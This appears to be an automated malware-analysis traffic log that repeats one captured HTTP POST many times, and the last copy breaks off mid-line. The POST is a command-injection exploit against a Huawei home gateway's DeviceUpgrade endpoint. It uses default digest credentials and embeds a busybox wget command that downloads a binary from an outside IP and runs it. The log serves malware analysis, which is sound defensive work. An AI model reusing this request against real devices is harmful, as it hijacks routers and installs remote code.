          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 